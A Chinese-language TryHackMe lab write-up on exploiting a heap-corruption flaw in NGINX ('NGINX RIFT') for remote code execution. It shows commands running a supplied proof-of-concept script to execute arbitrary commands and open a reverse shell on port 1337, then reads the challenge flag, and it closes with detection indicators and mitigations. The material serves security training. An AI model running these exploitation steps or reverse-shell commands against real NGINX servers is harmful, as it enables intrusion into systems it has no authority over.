本实验演示了CVE-2024-24945的利用,这是一个影响NGINX的堆损坏漏洞。目标是理解内存损坏如何导致远程代码执行(RCE),并获得利用、检测和缓解技术的实践经验。
本实验演示了CVE-2024-24945的利用,这是一个影响NGINX的堆损坏漏洞。 目标是了解内存损坏如何导致远程代码执行(RCE), 并获得利用、检测和缓解技术的实践经验。
. 确认存在漏洞的NGINX服务。 . 使用提供的概念验证(PoC)执行任意命令。 . 在目标容器上获得反弹shell。 . 获取挑战标志。 . 了解检测和缓解策略。
. 平台:TryHackMe . 目标服务:NGINX RIFT . 容器化环境:Docker . 利用工具:poc.py . 访问方式:VNC(虚拟网络计算)
服务验证
确认存在漏洞的容器正在运行且可访问。
sudo docker ps
curl -s http://127.0.0.1:19321/api/users/42
后端正常
执行提供的PoC以验证任意命令执行。
pytho3 poc.py --cmd 'echo hello from depthfirst > /tmp/pwned
验证成功执行:
sudo docker exec nginx-rift-nginx-1
cat /tmp/pwned
输出: hello from depthfirst
在目标容器上建立一个交互式shell。
python3 poc.py --shell
成功连接:
[] 正在监听端口1337上的反弹shell... [] 已连接。 $
访问挑战标志。
cat /flag.txt
THM{18_y34r_%t4t3_m15m4tch_rip5_th3_h34p}
防御者可以通过以下方式识别利用尝试:
. NGINX工作进程崩溃 . 段错误事件 . 意外的出站网络连接 . 可疑的shell进程(/bin/sh, bash) . 在临时目录中创建未经授权的文件
. 升级到打过补丁的NGINX版本。 . 应用最小权限原则。 . 限制不必要的出站网络流量。 . 实施持续日志监控。 . 使用容器安全控制和运行时监控。
本实验提供了以下方面的实践经验:
. 理解堆损坏漏洞。 . 利用远程代码执行缺陷。 . 建立反弹shell。 . 进行后利用验证。 . 识别危害指标和缓解技术。
此练习是在受控的TryHackMe实验室环境中进行的, 仅用于教育和防御性网络安全培训目的。
作者:[Benedict Ejepu Amaechi] 平台:TryHackMe 主题:CVE-2024-24945 NGINX RIFT 利用与防御 完成日期:2026年6月